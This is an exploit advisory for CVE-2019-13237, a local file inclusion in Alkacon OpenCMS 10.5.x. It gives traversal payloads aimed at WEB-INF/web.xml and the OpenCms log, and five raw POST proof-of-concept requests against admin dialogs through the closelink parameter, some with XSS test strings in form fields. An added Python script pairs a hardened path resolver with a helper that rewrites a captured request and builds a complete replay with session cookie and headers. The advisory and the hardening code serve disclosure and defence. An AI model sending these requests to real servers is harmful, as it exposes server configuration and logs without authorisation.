Alkacon OpenCMS 10.5.x Local File Inclusion
2019.09.10
Credit: Aetsu
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2019-13237
CWE: CWE-98
Overall CVSS score: 4/10
Impact: 2.9/10
Exploitability: 8/10
Required access: Remote
Attack complexity: Low
Authentication: Single
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13237

All five issues are the same weakness: the closelink parameter of administration dialogs under /system/workplace/admin/ accepts a traversal sequence, so the path the dialog redirects to after the action can be pointed at files outside the site tree, such as WEB-INF/web.xml or the OpenCms log. The dialogs sit inside the authenticated workplace (the metadata lists single authentication), so a replay needs a valid session cookie plus the Content-Type: application/x-www-form-urlencoded and Content-Length headers that the captures below leave out. The HTML-looking strings in the message.0 and name.0 fields are incidental test input; the parameter carrying the traversal is closelink in every case, and the thread values are run-specific identifiers from the author's sessions.

For the tests, I used the payloads:

```
..%2f..%2fWEB-INF%2flogs%2fopencms.log
..%2f..%2fWEB-INF%2fweb.xml
```

1. Affected resource (parameter closelink): /system/workplace/admin/workplace/loginmessage.jsp

POC:

```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com

enabled.0=true&enabled.0.value=true&message.0=%3Cimg+src%3D.+onerror%3Dalert%281%29%3E%0D%0A&loginForbidden.0.value=false&timeStart.0=1%2F3%2F2000+12%3A00+AM&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```

2. Affected resource (parameter closelink): /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp

POC:

```
POST /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp HTTP/1.1
Host: example.com

reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok
```

3. Affected resource (parameter closelink): /system/workplace/admin/accounts/group_new.jsp

POC:

```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com

name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27%29%3E&assignedOu.0=root+organizational+unit+%28%2F%29&enabled.0=true&enabled.0.value=true&ok=Ok&oufqn=&elementname=undefined&path=%252Faccounts%252Forgunit%252Fgroups%252Fnew&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```

4. Affected resource (parameter closelink): /system/workplace/admin/history/settings/index.jsp

POC:

```
POST /system/workplace/admin/history/settings/index.jsp HTTP/1.1
Host: example.com

versions.0=10&mode.0=2&ok=OK&elementname=undefined&path=%252Fhistory%252Fsettings&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```

5. Affected resource (parameter closelink): /system/workplace/admin/history/reports/clearhistory.jsp

POC:

```
POST /system/workplace/admin/history/reports/clearhistory.jsp HTTP/1.1
Host: example.com

reporttype=extended&reportcontinuekey=&thread=ac0bbd5f-66cd-11e9-ae09-0242ac11002b&classname=org.opencms.workplace.tools.history.CmsHistoryClearDialog&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=OK
```

Extended POCs: https://aetsu.github.io/OpenCms
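The following is an added example, not code from the advisory or from the OpenCms project. It models the closelink handling in both its naive and hardened forms, then rewrites one of the captured POC bodies so the advisory's second payload can be replayed with the headers the captures omit. BASE is an assumption: the advisory only shows that two "../" steps reach WEB-INF, so the resolution base is chosen to reproduce that depth; JSESSIONID is likewise an assumed cookie name, and the POC body is copied from item 2 above as sample input.

```python
"""Model of the closelink traversal plus a replay helper for the advisory's POCs.

Added example, not code from the advisory or from OpenCms itself. BASE is an
assumption (two "../" steps from it reach /WEB-INF, matching the payloads).
"""
import posixpath
from urllib.parse import parse_qsl, unquote, urlencode

# Hypothetical directory the dialog resolves closelink against.
BASE = "/system/workplace"

# Payloads from the advisory, URL-encoded exactly as sent in closelink.
ADVISORY_PAYLOADS = (
    "..%2f..%2fWEB-INF%2flogs%2fopencms.log",
    "..%2f..%2fWEB-INF%2fweb.xml",
)

# POC body 2 from the advisory (xmlcontentrepair.jsp), used as sample input.
POC2_PATH = "/system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp"
POC2_BODY = (
    "reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b"
    "&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok"
)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """URL-decode until stable, so %252e%252e (double-encoded "..") is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def vulnerable_resolve(base: str, closelink: str) -> str:
    """Naive handling: decode once and join; "../" walks out of the base."""
    return posixpath.normpath(posixpath.join(base, unquote(closelink)))


def safe_resolve(base: str, closelink: str) -> str:
    """Hardened handling: full decode, reject absolute/scheme/NUL, confine to base."""
    decoded = decode_fully(closelink).replace("\\", "/")
    if "\x00" in decoded or decoded.startswith("/") or "://" in decoded:
        raise ValueError("closelink must be a relative in-site path")
    resolved = posixpath.normpath(posixpath.join(base, decoded))
    root = base.rstrip("/")
    if resolved != root and not resolved.startswith(root + "/"):
        raise ValueError(f"closelink escapes {root}: {resolved}")
    return resolved


def rewrite_closelink(body: str, target: str) -> str:
    """Swap closelink in a captured POST body for a decoded target path.

    parse_qsl decodes once and urlencode re-encodes, so the advisory's
    double-encoded values such as path=%252Fworkplace... round-trip unchanged.
    """
    params = parse_qsl(body, keep_blank_values=True)
    return urlencode([(k, target if k == "closelink" else v) for k, v in params])


def build_request(host: str, path: str, body: str, session_id: str) -> str:
    """Render a raw POST with the headers the advisory captures leave out.

    JSESSIONID is an assumed cookie name; the advisory does not show it.
    """
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: JSESSIONID={session_id}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body.encode())}\r\n"
        "\r\n"
        f"{body}"
    )


if __name__ == "__main__":
    for payload in ADVISORY_PAYLOADS:
        print("naive   :", vulnerable_resolve(BASE, payload))
        try:
            safe_resolve(BASE, payload)
        except ValueError as err:
            print("hardened:", err)
    body = rewrite_closelink(POC2_BODY, "../../WEB-INF/logs/opencms.log")
    print(build_request("example.com", POC2_PATH, body, "<session>"))
```

The hardened resolver decodes repeatedly before normalising so a double-encoded `%252e%252e%252f` cannot slip past a single decode, and it compares the normalised result against the base with a trailing slash so a sibling directory such as `/system/workplaces` is not accepted as inside `/system/workplace`.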
Copyright 2024, cxsecurity.com